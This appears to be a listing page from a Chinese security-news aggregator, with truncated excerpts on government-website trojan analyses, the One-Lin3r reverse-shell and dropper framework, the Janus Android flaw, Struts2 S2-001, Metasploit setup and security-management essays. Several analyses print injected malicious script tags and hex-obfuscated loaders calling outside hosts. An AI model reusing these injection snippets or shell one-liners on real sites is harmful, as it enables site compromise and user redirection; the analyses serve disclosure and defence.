记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

宣城经济技术开发区管理委员会网站挂马分析

宣城经济技术开发区管理委员会网站挂马分析 网站名称 宣城经济技术开发区管理委员会网站 网站域名 www.xceda.gov.cn 挂马页面 http://www.xceda.gov.cn/index.html 挂马代码 var re=document.referrer; if (re.indexOf("baidu")>-1 || re.indexOf("so.com")>-1 || re.indexOf("sogou")>-1 || re.indexOf("sm.cn")>-1) { document.writeln("<div style='font-size:40px;text-align:center'>加载中请稍等</div>");
发布时间:2018-01-21 02:45 | 阅读:165757 | 评论:0 | 标签:专栏 挂马分析 挂马

懒人福音——渗透测试单行化

One-Lin3r是一个简单的轻量级框架,它的设计灵感来源于Metasploit中的web-delivery模块。  视频演示:https://asciinema.org/a/157020?autoplay=1 One-Lin3r也可以说是一个专为懒人而设计的渗透测试框架,因为它的使用多是用一行简单的命令就能解决的: Reverser:输入IP和端口,它将返回一个反向shell准备复制和粘贴。 Dropper:给它一个上传了后门的URL,它将返回下载并执行。 其它:如一些常常会用到的(例如:Mimikatz,Powerup等),支持所有主流的操作系统 (如Windows, Linux, 和 macOS),未来会 特点: 可以用全名或模糊查询数据库中的任何内容。 你可以按照以下步骤来添加创建自己的“.li
发布时间:2018-01-16 20:25 | 阅读:47979 | 评论:0 | 标签:专栏 懒人化 渗透工具

海门廉政网挂马分析

海门廉政网挂马分析 网站名称 海门廉政网 网站域名 www.hmlz.gov.cn 挂马页面 http://www.hmlz.gov.cn/index.html 挂马代码 <script type="text/javascript"> window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65"]('x3cx73x63x72x69x70x74 x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22 x73x72x63x3dx22x68x74x74x70x73x3ax2fx2fx77x77x77x2ex62x63x64x61x73x38x2ex63x6fx6dx2fx
发布时间:2018-01-11 04:00 | 阅读:64639 | 评论:0 | 标签:专栏 挂马分析 挂马

孙吴县纪检监察网挂马分析

孙吴县纪检监察网挂马分析 网站名称 孙吴县纪检监察网 网站域名 www.hljswjjw.gov.cn 挂马页面 http://www.hljswjjw.gov.cn/index.asp 挂马推断 在index.asp页面,使用asp代码对页面请求来源进行判断,当请求来源为搜索引擎爬虫时,返回恶意页面,否则返回正常页面(包含暗链)。 挂马代码 <script language='javascript' src='http://k8976.com/js.js'></script> 恶意代码 document.writeln("<title>澳门金沙</title>"); document.writeln("<meta name="keywords"
发布时间:2018-01-07 09:55 | 阅读:57516 | 评论:0 | 标签:专栏 挂马分析 挂马

随笔:“知所应知”,你所不知道的秘密

作为IT安全人员,相信每一位都知道“知所必须”原则,结合“最小权限”的就是两个“最小化”原则,是很多IT安全人员在入门课上就学到的。怎样才是最小,相信也是IT安全人员一直孜孜追求的,很多人困惑于“如何将信息尽可能少的传递、权限尽可能小的授予,并能保证该岗位执行其正常工作。 首先,我们来看一个广为流传案例:“沃尔玛的任何一位员工,不论他/她的级别如何,如果获知其他地方卖的某样东西比沃尔玛便宜,他/她就有权把沃尔玛的同类商品进行降价”。这是一个授权,而这个权利对于很多企业来讲,非常“不小“。而沃尔玛的授权体系远不止如此,他们采取“店中店”的模式授权部门经理管理自己的业务,并认为信息共享的前提下,授权才会起到作用,因此沃尔玛的员工对采购价格、运输成本等数据(这些数据在很多企业被视为机密数据)都了如指掌的,难道沃尔玛不
发布时间:2017-12-23 11:45 | 阅读:39971 | 评论:0 | 标签:专栏 企业安全

安卓上的核弹级漏洞 Janus

12月的安卓漏洞公告中修复一个编号为CVE-2017-13156的漏洞,是做 安卓 加固产品 DexGuard的那家公司发现的,周五就有人在 github 上公开了 POC。仔细看了一下,这个漏洞可谓是一个核弹级的大杀器,称之为今年 安卓 漏洞的 No.1也不为过,危害非常大。 熟悉 安卓 安全的童鞋,可能知道曾经风靡一时的 MasterKey 漏洞,Jansu 漏洞与 MasterKey 比较相似,它可以让我们对任何 APP 进行修改,加入任何代码,然后编译成 DEX 插入到原来的 APK 文件里,神奇的是,利用这个漏洞修改后的 APK,安卓系统会认为它的签名和修改之前的正版应用的签名一样,可以作为之前那个正版应用的更新安装,直接将原来的正版应用覆盖掉。而且,它比MasterKey 用起来更简单,利用
发布时间:2017-12-23 11:45 | 阅读:59042 | 评论:0 | 标签:专栏 漏洞利用 漏洞

CTF常见加密方式汇总

1.栅栏密码 在IDF训练营里做过一道关于栅栏密码的问题。 栅栏密码的解法很简单,也有点复杂,字符长度因数多得会有很多个密码。对,栅栏密码的解法就是:计算该字符串是否为合数,若为合数,则求出该合数除本身和1的因数,然后将字符串分隔。用笔者自己写的解法就是这样: 凯撒密码,古代凯撒大帝用来打仗时的密码。凯撒密码在外界也有很多种解法。这里我用在国外CTF平台WeChall一道凯撒密码来讲解 密码术可以大致分为两种,即移位和替换,当然也有两者结合的更复杂的方法。在移位中字母不变,位置改变;替换中字母改变,位置不变。将替换密码用于军事用途的第一个文件记载是恺撒著的《高卢记》。恺撒描述了他如何将密信送到正处在被围困、濒临投降的西塞罗。其中罗马字母被替换成希腊字母使得敌人根本无法看懂信息。苏托尼厄斯在公元二世纪写的
发布时间:2017-12-20 02:15 | 阅读:235433 | 评论:0 | 标签:专栏 CTF ctf试题 加密

DIY简易Python脚本调用AWVS扫描

前言 最近写了一个小系统,需要调用AWVS扫描工具的API接口实现扫描,在网上只搜到添加任务和生成报告的功能实现代码,无法添加扫描对象登录的用户名和密码,如果不登录系统扫描,扫描效果肯定会大打折扣。现在通过selenium实现,并实现扫描结果风险数量和类型的提取。 代码分解 用到的库:selenium,requests,BeautifulSoup 变量定义:包括awvs的用户名和密码、被测系统的用户名和密码等,具体如下, awvs_username = '' awvs_password = '' app_username = '' app_password = '' app_url = '' # 被测系统域名 api_key = '1986ad8c0a5b3df4d7028d5f4c06e936cb
发布时间:2017-12-20 02:15 | 阅读:38156 | 评论:0 | 标签:专栏 awvs 扫描

Kali工具之配置Metasploit

作者:野火研习社·Arch3r 简述 由于Kali Linux网络服务策略,Kali将不会自启动的网络服务,数据库服务包括在内.所以为了Metasploit以支持数据库的方式启动,需要运行一些必要的步骤. 官方文档 http://docs.kali.org/general-use/starting-metasploit-framework-in-kali 步骤 1. 启动PostgreSQL服务 因为Metasploit 使用PostgreSQL作为数据库,所以必须先启PostgreSQL服务。 在命令行下输入下面命令: service postgresql start 执行成功后,可以通过ss -ant命令查看端口5432是否在侦听,去验证PostgreSQL服务是否成功开启。 State Recv-Q 
发布时间:2017-12-19 09:15 | 阅读:58426 | 评论:0 | 标签:专栏 Kali 工具 渗透工具

Struts 2 漏洞系列之 S2-001

漏洞原理     Struts 2 框架的表单验证机制( Validation )主要依赖于两个拦截器:validation 和 workflow。     validation 拦截器工作时,会根据 XML 配置文件来创建一个验证错误列表;workflow 拦截器工作时,会根据 validation 拦截器所提供的验证错误列表,来检查当前所提交的表单是否存在验证错误。     在默认配置下,如果 workflow 拦截器检测到用户所提交的表单存在任何一个验证错误,workflow 拦截器都会将用户的输入进行解析处理,随即返回并显示处理结果。     那么问题出在哪里呢?我们再来了解 Struts 2 框架中的一个标签处理功能: altSyntax。      altSyntax 功能是 Struts 2 框架
发布时间:2017-12-08 06:20 | 阅读:44183 | 评论:0 | 标签:专栏 Struts2 漏洞

古竹镇人民政府网挂马分析

古竹镇人民政府网挂马分析 网站名称 古竹镇人民政府网 网站域名 www.guzhu.gov.cn 挂马页面 http://www.guzhu.gov.cn/index.asp 挂马代码 <script type="text/javascript" src="http://103.79.184.94:88/bclide.js"></script> 恶意代码 var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?cfe824ad30beb506ef0afb3c32d38f0b"; var s = docum
发布时间:2017-11-30 03:15 | 阅读:37256 | 评论:0 | 标签:专栏 挂马分析 挂马

随笔:信息安全保密管理实务

信息安全是企业竞争的关键之一,然而信息的公开与保密,是矛盾的一体。一方面是公开信息是管理的需求,而另一方面信息保密是竞争的需要;同一信息,在不同时间段,对保密和公开的需求是不同的。笔者从实务的角度进行阐明。以资信息安全同业者参考。 公开与保密的矛盾: 举例而言,某些企业薪资与奖金结构具有典型的公开与保密的矛盾。首先,对薪资、奖金信息进行保密,可以使企业有效的在人力资源市场中进行竞争。然而,有些企业为了执行激励机制,可能采取计件工资制等公开的薪资制度,从而使员工通过简单的换算即使可获知他人的薪酬水平;有些企业采取级差与权重系数制度,为保持其公正性,级差和权重系数是公示的,因此也能够使他人很容易推算出全体员工的报酬。类似的情况比比皆是,信息的公开与保密之间的矛盾由此产生。例如:处理这一矛盾的良好做法包括重叠型级差方
发布时间:2017-11-09 06:10 | 阅读:57736 | 评论:0 | 标签:专栏 保密管理 信息安全

随笔:CSRS (Cyber Security Response System)要点

面向网络安全管理,在建设预警和防护措施的同时,面对突发事件的处置也是企业网络安全部门需要重点关注的内容。 信息安全突发事件的处置随着计算机的出现即受到企业的关注,CERT(计算机应急响应小组)作为早期出现的应急响应模式也逐渐发展成为应急中心的模式,因此企业有必要回顾网络安全突发事件的处置策略和体系。 建设网络安全突发处置体系(Cyber Security Response System),笔者认为可以从以下方面进行设计: 1、 CSRS策略是企业面对网络安全事件处置的基本指导,由管理层可接受的风险所决定,CSRS策略的制定需要基于风险分析。需要注意的是,网络安全事件的风险分析和DRP是不同的,例如:DRP中的风险分析并不包括信息泄露。 2、 CSRS响应范围的确立,针对网络安全事件的管理,很重要的一点是需要
发布时间:2017-10-26 23:20 | 阅读:37486 | 评论:0 | 标签:专栏 企业安全 网络安全管理

Kali Linux来袭~老司机带你进击

本次推荐内容主要介绍Kali-Linux的安装,包括镜像文件的快速安装,以及Kali-Linux硬盘安装、Kali-LinuxUSB软启动安装、Kali-Linux基于树莓派的安装、Kali-Linux虚拟机安装和Kali-Linux双系统安装。此外还介绍了Kali-Linux的基本配置和工具的作用,Kali-Linux网络环境和配置文件。希望表弟们可以像操作Windows一样熟练操作Kali-Linux系统。 kali法宝好,现在老司机带你在kali这条路上越走越高,由初级步入中级,稳中求进! Kali Linux是一个高级渗透测试和安全审计Linux发行版,Kali是BackTrackLinux完全遵循Debian开发标准彻底的完全重建.全新的目录框架,复查并打包所有工具,我们还为VCS建立了Git树。
发布时间:2017-10-24 03:35 | 阅读:64881 | 评论:0 | 标签:专栏 Kali Linux

“锁大师”暗刷流量劫持主页,已影响百万用户

近日,金山毒霸安全实验室监控到一款名为“锁大师”的流氓软件,该软件已开始大规模强制劫持用户浏览器主页,暗刷流量。 “锁大师”主要通过软件下载器为载体进行传播安装,预估受影响的用户量在百万级别。               图:“锁大师”以下载器为载体进行传播                                      图:”锁大师”下载地址 1、  “锁大师” 堪称一个Rootkit木马隐蔽性较高,它会通过创建文件过滤,将自己重定向到微软的文件上(ntkemgr.sys[恶意驱动]->重定向->partmgr.sys[微软正常驱动]),这样一来肉眼看则是正常文件,恶意驱动自身不会被发现。                                           
发布时间:2017-10-01 08:10 | 阅读:86434 | 评论:0 | 标签:专栏 网络安全

随笔:企业的 两个关键“流”-财务与信息

在人体中,血液的流动负责输送氧,神经则负责感知与传送信号,如果把企业比作一个人,财务就是企业的血液,而IT(信息技术 )则是企业的神经。风险管控体系之于企业则好比人体的免疫系统,而信息安全则是这一免疫系统中的重要卫士之一。 对于企业而言,如果希望在竞争中保持有效性,对财务和IT(信息技术,见注1)的良好运用是成功的关键,而财务和IT的最关键特性就是流动性。作为企业的两个核心流,财务与IT有很多共性,对这些共性进行分析并加以利用,是推动企业走向成功的有效手段。 战略性:如果说企业必须选定关键的战略性竞争资源,那么资金和信息一定是企业战略竞争不可或缺的,资金为企业提供了其他各种竞争资源的获取能力,而信息则保障企业在竞争中的决策优势,资金管理和信息管理即是财务和IT管理的核心。由于财务与IT的战略地位,因此良好的做
发布时间:2017-09-25 16:05 | 阅读:27105 | 评论:0 | 标签:专栏 企业安全管理

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词